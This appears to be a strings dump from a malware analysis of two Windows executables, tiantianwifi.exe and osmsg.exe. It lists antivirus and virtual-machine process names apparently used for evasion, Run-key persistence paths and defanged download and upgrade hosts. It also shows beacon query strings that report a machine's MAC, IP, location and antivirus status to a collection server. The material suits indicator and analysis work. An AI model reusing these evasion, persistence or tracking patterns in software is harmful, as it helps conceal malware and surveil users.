?h=X-X-X-X-X-X&r=7891_%s --- sdadsada
?h=X-X-X-X-X-X&r=%s_%s&a=%d&rt=%d --- adadsada
?h=X-X-X-X-X-X&r=%s_%s&a=%d --- adadsada
mac=X-X-X-X-X-X&app=%s&uid=%s&err=%s
YeapUserInfo.ini
swapfile.ini
\StringFileInfo\x\%s
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
cmd /C %s
edddddd
Mddddd
Nekrn.exe
BaiduAn.exe
BaiduSd.exe
360sd.exe
360rp.exe
360Safe.exe
360tray.exe
avguard.exe
avp.exe
avgui.exe
AvastUI.exe
BavSvc.exe
rstray.exe
SSScheduler.exe
ccSvcHst.exe
KVwsc.exe
FilMsg.exe
secenter.exe
coreServiceShell.exe
Portuguese(Brazilian)
Portuguese(Standard)
GOOGLE CHROME
EXPLORER.EXE
hXXp://upgrade.eszju.cn/
setup.exe
hXXp://down.eszju.cn/
"%s" /UPGRADE:"%s"
"%s" /UPGRADE:FINSIH
s%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log
000000000000000
0000000
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-KS1NL.tmp\AutoTime.exe
Windows
Windows
:hXXp://VVV.tobeahero.cn
:[email protected]
1, 0, 0, 1
AutoShut.EXE
Arrange Icons/Arrange windows so they overlap
Cascade Windows5Arrange windows as non-overlapping tiles
Tile Windows5Arrange windows as non-overlapping tiles
Tile Windows(Split the active window into panes
Replace%Select the entire document

tiantianwifi.exe_2436:

.text
`.rdata
@.data
.rsrc
@.reloc
SSHPV
tAHt.Ht
j.Yf;
_tcPVj@
.PjRW
t.hpwZ
4444444
,index[%d],
(00356783465456)
XEle_IsShowEle
(%d),
(%d),name(%s)
API:%s()
,[%s]
=RegDeleteKeyExW
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
MaxPolicyElementKey
pExecutionResource
src\Path.cpp
0 <= n && n <= _dirs.size()
!_dirs.empty()
d:\sdk\poco-1.5.4\foundation\src\FileStream_WIN32.cpp
d:\sdk\poco-1.5.4\foundation\src\File_WIN32U.cpp
!_path.empty()
src\File.cpp
src\DirectoryIteratorStrategy.cpp
Property not supported
%<>{}|\"^`
https
bad or invalid port number
src\TemporaryFile.cpp
src\BinaryWriter.cpp
src\DateTime.cpp
Windows 3.x
Windows 95
Windows 98
Windows NT
Windows Vista/Server 2008
Windows 7/Server 2008 R2
Windows 8/Server 2012
Windows 2000
Windows XP
Windows Server 2003/Windows Server 2003 R2
Windows 95/Windows NT 4.0
Windows ME
x:x:x:x:x:x
src\TextConverter.cpp
src\Process.cpp
inPipe == 0 || (inPipe != outPipe && inPipe != errPipe)
src\TextIterator.cpp
d:\sdk\poco-1.5.4\foundation\src\bignum.h
d:\sdk\poco-1.5.4\foundation\src\bignum-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\bignum.cc
d:\sdk\poco-1.5.4\foundation\src\fast-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\strtod.cc
d:\sdk\poco-1.5.4\foundation\src\double-conversion.cc
src\NumericString.cpp
windows-1250
Windows-1250
windows-1251
Windows-1251
windows-1252
Windows-1252
cannot create named event %s [Error %d: %s]
anonymous pipe
d:\sdk\poco-1.5.4\foundation\src\PipeImpl_WIN32.cpp
src\Net.cpp
Network failure while reading HTTP request header
Error reading HTTP request header
No HTTP request header
HTTP request method invalid or too long
HTTP request URI invalid or too long
Invalid HTTP version string
Unsupported Media Type
HTTP Version not supported
No HTTP response header
Invalid HTTP status code
HTTP reason string too long
HTTP/1.0
HTTP/1.1
Cannot set the port number for an already connected session
Cannot set the proxy host and port for an already connected session
Cannot set the proxy port number for an already connected session
hXXp://
src\SocketAddress.cpp
!hostAndPort.empty()
Missing port number
Invalid address length passed to SocketAddress()
unsupported IP address family
HTTP Exception
Unsupported HTTP redirect (protocol change)
FTP Exception
SMTP Exception
WebSocket Exception
Unknown or unsupported socket family.
src\MessageHeader.cpp
HttpOnly
; HttpOnly
()[]/|\',;
Invalid or unsupported address family passed to IPAddress()
0.0.0.0
Invalid address length passed to IPAddress()
Invalid prefix length passed to IPAddress()
src\HTTPSession.cpp
src\HTTPHeaderStream.cpp
src\HTTPStream.cpp
src\HTTPFixedLengthStream.cpp
src\HTTPChunkedStream.cpp
src\HostEntry.cpp
src\Socket.cpp
Invalid or unsupported address family passed to StreamSocketImpl
255.255.255.255
src\IPAddressImpl.cpp
mask() is only supported for IPv4 addresses
src\SocketImpl.cpp
Operation would block
Operation now in progress
Operation already in progress
Socket operation attempted on non-socket
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
inflate 1.2.5 Copyright 1995-2010 Mark Adler
Not a valid registry key
: type not supported
Cannot open registry key:
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
Not a valid root key
hXXp://VVV.appinf.com/features/no-whitespace-in-element-content
hXXp://xml.org/sax/features/validation
hXXp://xml.org/sax/features/namespaces
hXXp://xml.org/sax/features/namespace-prefixes
hXXp://xml.org/sax/features/external-general-entities
hXXp://xml.org/sax/features/external-parameter-entities
hXXp://xml.org/sax/features/string-interning
hXXp://xml.org/sax/properties/declaration-handler
hXXp://xml.org/sax/properties/lexical-handler
hXXp://VVV.appinf.com/features/enable-partial-reads
src\NamePool.cpp
src\ParserEngine.cpp
Unexpected parser state - please send a bug report
Requested feature requires XML_DTD support in Expat
!_context.empty()
Unsupported SAX feature or property identifier
src\EntityResolverImpl.cpp
src\Element.cpp
src\XMLFilterImpl.cpp
xml=hXXp://VVV.w3.org/XML/1998/namespace
unexpected parser state - please send a bug report
requested feature requires XML_DTD support in Expat
expat_2.1.0
hXXp://VVV.w3.org/XML/1998/namespace
hXXp://VVV.w3.org/2000/xmlns/
0 <= i && i < static_cast<int>(_attributes.size())
src\AttributesImpl.cpp
src\AbstractContainerNode.cpp
Data is specified for a node which does not support data
The implementation does not support the type of object requested
A parameter or an operation is not supported by the underlying object
src\ElementsByTagNameList.cpp
src\AttrMap.cpp
src\DTDMap.cpp
src\ChildNodesList.cpp
hXXp://VVV.w3.org/xmlns/2000/
src\NamespaceSupport.cpp
_contexts.size() > 0
Unsupported or invalid date/time format
%w, %e %b %r %H:%M:%S %Z
%W, %e %b %r %H:%M:%S %Z
%Y-%m-%dT%H:%M:%S%z
%Y-%m-%dT%H:%M:%s%z
%w, %e %b %y %H:%M:%S %Z
%w, %e %b %Y %H:%M:%S %Z
%w, %d %b %Y %H:%M:%S %Z
%W, %e-%b-%y %H:%M:%S %Z
%W, %e %b %y %H:%M:%S %Z
%w %b %f %H:%M:%S %Y
%Y-%m-%d %H:%M:%S
src\MemoryPool.cpp
src\URIStreamOpener.cpp
src\FileStreamFactory.cpp
uri.isRelative() || uri.getScheme() == "file"
WlanHostedNetworkSetSecondaryKey
WlanHostedNetworkQuerySecondaryKey
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
Rasapi32.dll
HKEY_USERS\%s\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
..\..\Src\Common\OperatingSystem.cpp
%s[%d]:%s
CoInitializeEx failed: %x
Failed to create an instance of ITaskService: %x
ITaskService::Connect failed: %x
ITaskService::GetFolder failed: %x
.d
%s[%d]
..\..\Src\Common\CommUtils.cpp
http\shell\open\command
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes
FaviconURLFallback
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\%s
hXXp://VVV.sogou.com/favicon.ico
Chrome
Mozilla Firefox
Opera
Zihu.exe
QtWeb
SeaMonkey
Mozilla Firefox 29.0.0.0 Nightly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_USERS\%s\Software\%s
HKEY_CURRENT_USER\Software\%s
user32.dll
HKEY_USERS\%s\Software\%s\appInstall\%s
HKEY_CURRENT_USER\Software\%s\appInstall\%s
HKEY_USERS\%s\Software\%s\appInstall\
HKEY_CURRENT_USER\Software\%s\appInstall\
ntdll.dll
kernel32.dll
Wtsapi32.dll
winlogon.exe
explorer.exe
Process token open Error: %u
Lookup Privilege value Error: %u
DuplicateTokenEx Error: %u
CreateProcessAsUser Error: %u
User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
collect0.eszju.cn
mac=%s&app=%s&uid=%s&serno=%s&sid=%s
mac=%s&app=%s&uid=%s&serno=%s&mos=%s&mip=%s&sid=%s
mac=X-X-X-X-X-X&serno=%s&mos=%s&app=%s&uid=%s&sn=%s&fn=%s&fs=%ld&mifr=%s&sid=%s
..\..\Src\Common\Internet.cpp
F:\pz_git\vendor\inc\Poco/String.h
..\..\Src\Common\FileAssoc.cpp
open with %s
X:X:X:X:X:X
dnsapi.dll
X-X-X-X-X-X
%d.%d.%d.%d
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
..\..\Src\Common\Adapter.cpp
F:\pz_git\vendor\inc\Poco/SharedPtr.h
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
: this object does't support a special last block
: this object doesn't support multiple channels
is not a valid key length
F:\pz_git\bin\tiantianwifi.pdb
GetProcessHeap
KERNEL32.dll
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
SetViewportOrgEx
GDI32.dll
RegOpenKeyExW
RegCloseKey
RegEnumKeyW
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
ole32.dll
OLEAUT32.dll
gdiplus.dll
MSIMG32.dll
WS2_32.dll
IPHLPAPI.DLL
IMM32.dll
VERSION.dll
GetCPInfo
CreatePipe
RegQueryInfoKeyA
zcÁ
1.2.5
.?AVinvalid_operation@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVPropertyNotSupportedException@Poco@@
.?AVProcessHandleImpl@Poco@@
.?AVWindows1250Encoding@Poco@@
.?AVWindows1251Encoding@Poco@@
.?AVWindows1252Encoding@Poco@@
.?AVPipeImpl@Poco@@
.?AVHTTPException@Net@Poco@@
.?AVHTTPRequest@Net@Poco@@
.?AVHTTPMessage@Net@Poco@@
.?AVHTTPResponse@Net@Poco@@
.?AVHTTPClientSession@Net@Poco@@
.?AVHTTPSession@Net@Poco@@
.?AVUnsupportedRedirectException@Net@Poco@@
.?AVFTPException@Net@Poco@@
.?AVSMTPException@Net@Poco@@
.?AVWebSocketException@Net@Poco@@
.?AVUnsupportedFamilyException@Net@Poco@@
.?AV?$BasicBufferedStreamBuf@DU?$char_traits@D@std@@VHTTPBufferAllocator@Net@Poco@@@Poco@@
.?AVHTTPHeaderStreamBuf@Net@Poco@@
.?AVHTTPHeaderIOS@Net@Poco@@
.?AVHTTPHeaderInputStream@Net@Poco@@
.?AVHTTPHeaderOutputStream@Net@Poco@@
.?AVHTTPStreamBuf@Net@Poco@@
.?AVHTTPIOS@Net@Poco@@
.?AVHTTPInputStream@Net@Poco@@
.?AVHTTPOutputStream@Net@Poco@@
.?AVHTTPFixedLengthStreamBuf@Net@Poco@@
.?AVHTTPFixedLengthIOS@Net@Poco@@
.?AVHTTPFixedLengthInputStream@Net@Poco@@
.?AVHTTPFixedLengthOutputStream@Net@Poco@@
.?AVHTTPChunkedStreamBuf@Net@Poco@@
.?AVHTTPChunkedIOS@Net@Poco@@
.?AVHTTPChunkedInputStream@Net@Poco@@
.?AVHTTPChunkedOutputStream@Net@Poco@@
.?AVSAXNotSupportedException@XML@Poco@@
.?AVCXEventMsg@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AVSimpleKeyingInterface@CryptoPP@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.?AVHexEncoder@CryptoPP@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
%Program Files%\ttwifi\tiantianwifi.exe
00000000000000000001
{9r.UV
}.xpC
{X%%St
!iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:F7F81361F2A011E3B1709C089141CCFF" xmpMM:DocumentID="xmp.did:F7F81362F2A011E3B1709C089141CCFF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F7F8135FF2A011E3B1709C089141CCFF" stRef:documentID="xmp.did:F7F81360F2A011E3B1709C089141CCFF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:9FA515C8F2A011E3B26ADED699BC536F" xmpMM:DocumentID="xmp.did:9FA515C9F2A011E3B26ADED699BC536F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9FA515C6F2A011E3B26ADED699BC536F" stRef:documentID="xmp.did:9FA515C7F2A011E3B26ADED699BC536F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>[C
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:2C71C4ADF2A111E3827FEB97C5E9C090" xmpMM:DocumentID="xmp.did:2C71C4AEF2A111E3827FEB97C5E9C090"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2C71C4ABF2A111E3827FEB97C5E9C090" stRef:documentID="xmp.did:2C71C4ACF2A111E3827FEB97C5E9C090"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>AU
6-h}1yh
w.KvK
V(Y%u
<ow.Hv
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
?(?2?>?[?
3(323>3[3
3L4q4
8;X;v;
5%5x6
7%7U7
? ?$?(?,?0?4?8?
1$1(1,101
0C1k1y1<3\3c3k3p3t3x3
9 9$9(9,9094989<9
9 9$9(9,9094989
7*818S8 9Ÿ9_9
= =*=4=>=
5;6@6[6`6
1"1,161@1
1 2$2(2,2
9 9$9(9,90949
4 4$4(4,404
2 2$2(2,20242
8 8$8(8,808
8-8U8}8
=$=,=4=<=
; ;$;(;,;
3 3$3(3,303
4$4,484\4
?$?,?8?`?
<,<8<@<`<
ID(%d),
(%d),XC_ELE,ID(%d),bShow(%d)
(%d),XC_BUTTON,ID(%d),bShow(%d)
(%d),XC_RADIO,ID(%d),bShow(%d)
(%d),XC_CHECK,ID(%d),bShow(%d)
(%d),XC_EDIT,ID(%d),bShow(%d)
(%d),XC_RICHEDIT,ID(%d),bShow(%d)
(%d),XC_COMBOBOX,ID(%d),bShow(%d)
(%d),XC_SCROLLBAR,ID(%d),bShow(%d)
(%d),XC_SCROLLVIEW,ID(%d),bShow(%d)
(%d),XC_LIST,ID(%d),bShow(%d)
(%d),XC_LISTBOX,ID(%d),bShow(%d)
(%d),XC_TREE,ID(%d),bShow(%d)
(%d),XC_MENUBAR,ID(%d),bShow(%d)
(%d),XC_PROPERTYPAGE,ID(%d),bShow(%d)
(%d),XC_SLIDERBAR,ID(%d),bShow(%d)
(%d),XC_PROGRESSBAR,ID(%d),bShow(%d)
(%d),XC_TOOLBAR,ID(%d),bShow(%d)
(%d),XC_STATIC,ID(%d),bShow(%d)
(%d),XC_GROUPBOX,ID(%d),bShow(%d)
(%d),XC_PICTURE,ID(%d),bShow(%d)
(%d),XC_MONTHCAL,ID(%d),bShow(%d)
(%d),XC_DATETIME,ID(%d),bShow(%d)
(%d),XC_PROPERTYGRID,ID(%d),bShow(%d)
(%d),XC_CHOOSECOLOR,ID(%d),bShow(%d)
(%d),XC_OUTLOOK,ID(%d),bShow(%d)
(%d),XC_TEXTLINK,ID(%d),bShow(%d)
(%d),XC_TABBAR,ID(%d),bShow(%d)
(%d),XC_GIF,ID(%d),bShow(%d)
(%d),XC_EDITFILE,ID(%d),bShow(%d)
(%d),XC_LISTVIEW,ID(%d),bShow(%d)
(%d),XC_PANE,ID(%d),bShow(%d)
(%d),XC_DRAGBAR,ID(%d),bShow(%d)
(%d),XC_SCROLLVIEW_VIEW,ID(%d),bShow(%d)
(%d),XC_CAPTION,ID(%d),bShow(%d)
(%d),XC_MENUBAR_BUTTON,ID(%d),bShow(%d)
(%d),XC_TOOLBAR_BUTTON,ID(%d),bShow(%d)
(%d),XC_PROPERTYPAGE_LABEL,ID(%d),bShow(%d)
(%d),XC_PIER,ID(%d),bShow(%d)
(%d),XC_BUTTON_MENU,ID(%d),bShow(%d)
(%d),XC_VIRTUAL_ELE,ID(%d),bShow(%d)
(%d),XC_BUTTON_MIN,ID(%d),bShow(%d)
(%d),XC_BUTTON_MAX,ID(%d),bShow(%d)
(%d),XC_BUTTON_CLOSE,ID(%d),bShow(%d)
(%d),XC_TREE_SUPER,ID(%d),bShow(%d)
left:%d , top:%d , right:%d , bottom:%d
title=%s
combase.dll
Fmscoree.dll
Fkernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
ADVAPI32.DLL
USER32.DLL
portuguese-brazilian
Iadvapi32.dll
Current version does not support XP
%s. Error code %x.
Failed to enable ICS. Error code %x.
" joined the hosted network
Hosted network key should contain 8 ~ 63 case-sensitive characters.
Hosted network name should contain 1 ~ 32 case-sensitive characters, and hosted network key contains 8 ~ 63 case-sensitive characters.
MSOFTWARE\Policies\Microsoft\Windows\Network Connections
bSystem\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
bnetshell.dll
NCM_SHAREDACCESSHOST_LAN
NCM_SHAREDACCESSHOST_RAS
bWlanapi.dll
edddddd
Mddddd
VBoxTray.exe
VBoxService.exe
VMwareUser.exe
VMwareTray.exe
VMUpgradeHelper.exe
vmtoolsd.exe
vmacthlp.exe
Nekrn.exe
BaiduAn.exe
BaiduSd.exe
360sd.exe
360rp.exe
360Safe.exe
360tray.exe
avguard.exe
avp.exe
avgui.exe
AvastUI.exe
BavSvc.exe
QQPCRTP.exe
QQPCTray.exe
KMService.exe
kxescore.exe
kxetray.exe
ksafe.exe
KSafeSvc.exe
KSafeTray.exe
KAVStart.exe
KWatch.exe
KMailMon.exe
VPTray.exe
Portuguese(Brazilian)
Portuguese(Standard)
:yqsclient.exe
barrms.exe
puwin.exe
TLnbLdr.exe
Pubwin.exe
rwyNCMc.exe
BarClientView.exe
hintclinet.exe
eyoorun.exe
clsmn.exe
PubwinClient.exe
mpclient.exe
fzclient.exe
wxsyncli.exe
recreation.exe
d\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
nHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
tmpData.ini
etmpData.ini
swapfile.ini
sEXPLORER.EXE
hXXp://upgrade.eszju.cn/
setup.exe
%s %s
hXXp://down.eszju.cn/
hXXp://down.eszju.cn/%s
"%s" /UPGRADE:"%s"
"%s" /UPGRADE:FINSIH
procexp.exe
QQ.exe
taskmgr.exe
"%s" %s
hXXp://1111.ip138.com/ic.asp
hXXp://ip.chinaz.com/?IP=
hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php
mac=X-X-X-X-X-X&app=%s&uid=%s&err=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ant=%d&ip=%s&lpn=%s&osrt=%d&inbar=%d&vm=%d&area=%d&sid=%s&ost=%s&hid=%s&geo=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ost=%s&hid=%s&ver=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ip=%s&fht=%d&olt=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ost=%s&hid=%s&ver=%s&ant=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&rt=%d&fr=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sn=%s&fn=%s&fs=%ld&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sil=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sid=%s&aplst=
smac=X-X-X-X-X-X&app=%s&uid=%s&rson=%d&msg=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&adid=%d&ver=%s&sid=%s
%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
\StringFileInfo\x\%s
\\.\PHYSICALDRIVE%d
HARDWARE\DEVICEMAP\Scsi\Scsi Port %d\Scsi Bus %d\Target Id 0\Logical Unit Id 0
1.0.0.15
WifiShare.rc

osmsg.exe_2564:

.text
`.rdata
@.data
.rsrc
@.reloc
SSHPV
tAHt.Ht
j.Yf;
_tcPVj@
.PjRW
j.hDiW
4444444
n%x4X
(00356783465456)
XEle_IsShowEle
(%d),
(%d),name(%s)
API:%s()
,[%s]
=RegDeleteKeyExW
operator
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Property not supported
cannot allocate thread context key
cannot join thread
src\Thread.cpp
src\Random.cpp
d:\sdk\poco-1.5.4\foundation\src\FileStream_WIN32.cpp
%<>{}|\"^`
https
bad or invalid port number
src\TemporaryFile.cpp
src\BinaryWriter.cpp
d:\sdk\poco-1.5.4\foundation\src\File_WIN32U.cpp
!_path.empty()
src\File.cpp
src\DateTime.cpp
src\Path.cpp
0 <= n && n <= _dirs.size()
!_dirs.empty()
src\DirectoryIteratorStrategy.cpp
src\ErrorHandler.cpp
src\TextConverter.cpp
src\Process.cpp
inPipe == 0 || (inPipe != outPipe && inPipe != errPipe)
Windows 3.x
Windows 95
Windows 98
Windows NT
Windows Vista/Server 2008
Windows 7/Server 2008 R2
Windows 8/Server 2012
Windows 2000
Windows XP
Windows Server 2003/Windows Server 2003 R2
Windows 95/Windows NT 4.0
Windows ME
x:x:x:x:x:x
src\TextIterator.cpp
d:\sdk\poco-1.5.4\foundation\src\bignum.h
d:\sdk\poco-1.5.4\foundation\src\bignum-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\bignum.cc
d:\sdk\poco-1.5.4\foundation\src\fast-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\strtod.cc
d:\sdk\poco-1.5.4\foundation\src\double-conversion.cc
src\NumericString.cpp
windows-1250
Windows-1250
windows-1251
Windows-1251
windows-1252
Windows-1252
cannot create named event %s [Error %d: %s]
anonymous pipe
d:\sdk\poco-1.5.4\foundation\src\PipeImpl_WIN32.cpp
src\Net.cpp
Network failure while reading HTTP request header
Error reading HTTP request header
No HTTP request header
HTTP request method invalid or too long
HTTP request URI invalid or too long
Invalid HTTP version string
Unsupported Media Type
HTTP Version not supported
No HTTP response header
Invalid HTTP status code
HTTP reason string too long
HTTP/1.0
HTTP/1.1
Cannot set the port number for an already connected session
Cannot set the proxy host and port for an already connected session
Cannot set the proxy port number for an already connected session
hXXp://
src\SocketAddress.cpp
!hostAndPort.empty()
Missing port number
Invalid address length passed to SocketAddress()
unsupported IP address family
HTTP Exception
Unsupported HTTP redirect (protocol change)
FTP Exception
SMTP Exception
WebSocket Exception
Unknown or unsupported socket family.
src\MessageHeader.cpp
HttpOnly
; HttpOnly
()[]/|\',;
Invalid or unsupported address family passed to IPAddress()
0.0.0.0
Invalid address length passed to IPAddress()
Invalid prefix length passed to IPAddress()
src\HTTPSession.cpp
src\HTTPHeaderStream.cpp
src\HTTPStream.cpp
src\HTTPFixedLengthStream.cpp
src\HTTPChunkedStream.cpp
src\HostEntry.cpp
src\Socket.cpp
Invalid or unsupported address family passed to StreamSocketImpl
255.255.255.255
src\IPAddressImpl.cpp
mask() is only supported for IPv4 addresses
src\SocketImpl.cpp
Operation would block
Operation now in progress
Operation already in progress
Socket operation attempted on non-socket
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported
hXXp://VVV.appinf.com/features/no-whitespace-in-element-content
hXXp://xml.org/sax/features/validation
hXXp://xml.org/sax/features/namespaces
hXXp://xml.org/sax/features/namespace-prefixes
hXXp://xml.org/sax/features/external-general-entities
hXXp://xml.org/sax/features/external-parameter-entities
hXXp://xml.org/sax/features/string-interning
hXXp://xml.org/sax/properties/declaration-handler
hXXp://xml.org/sax/properties/lexical-handler
hXXp://VVV.appinf.com/features/enable-partial-reads
src\NamePool.cpp
src\ParserEngine.cpp
Unexpected parser state - please send a bug report
Requested feature requires XML_DTD support in Expat
!_context.empty()
Unsupported SAX feature or property identifier
src\EntityResolverImpl.cpp
src\Element.cpp
src\XMLFilterImpl.cpp
xml=hXXp://VVV.w3.org/XML/1998/namespace
unexpected parser state - please send a bug report
requested feature requires XML_DTD support in Expat
expat_2.1.0
hXXp://VVV.w3.org/XML/1998/namespace
hXXp://VVV.w3.org/2000/xmlns/
0 <= i && i < static_cast<int>(_attributes.size())
src\AttributesImpl.cpp
src\AbstractContainerNode.cpp
Data is specified for a node which does not support data
The implementation does not support the type of object requested
A parameter or an operation is not supported by the underlying object
src\ElementsByTagNameList.cpp
src\AttrMap.cpp
src\DTDMap.cpp
src\ChildNodesList.cpp
hXXp://VVV.w3.org/xmlns/2000/
src\NamespaceSupport.cpp
_contexts.size() > 0
Not a valid registry key
: type not supported
Cannot open registry key:
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
Not a valid root key
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
inflate 1.2.5 Copyright 1995-2010 Mark Adler
MaxPolicyElementKey
pExecutionResource
Unsupported or invalid date/time format
%w, %e %b %r %H:%M:%S %Z
%W, %e %b %r %H:%M:%S %Z
%Y-%m-%dT%H:%M:%S%z
%Y-%m-%dT%H:%M:%s%z
%w, %e %b %y %H:%M:%S %Z
%w, %e %b %Y %H:%M:%S %Z
%w, %d %b %Y %H:%M:%S %Z
%W, %e-%b-%y %H:%M:%S %Z
%W, %e %b %y %H:%M:%S %Z
%w %b %f %H:%M:%S %Y
%Y-%m-%d %H:%M:%S
src\MemoryPool.cpp
src\URIStreamOpener.cpp
src\FileStreamFactory.cpp
uri.isRelative() || uri.getScheme() == "file"
CoInitializeEx failed: %x
Failed to create an instance of ITaskService: %x
ITaskService::Connect failed: %x
ITaskService::GetFolder failed: %x
..\..\Src\Common\CommUtils.cpp
%s[%d]
http\shell\open\command
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes
hXXp://VVV.sogou.com/favicon.ico
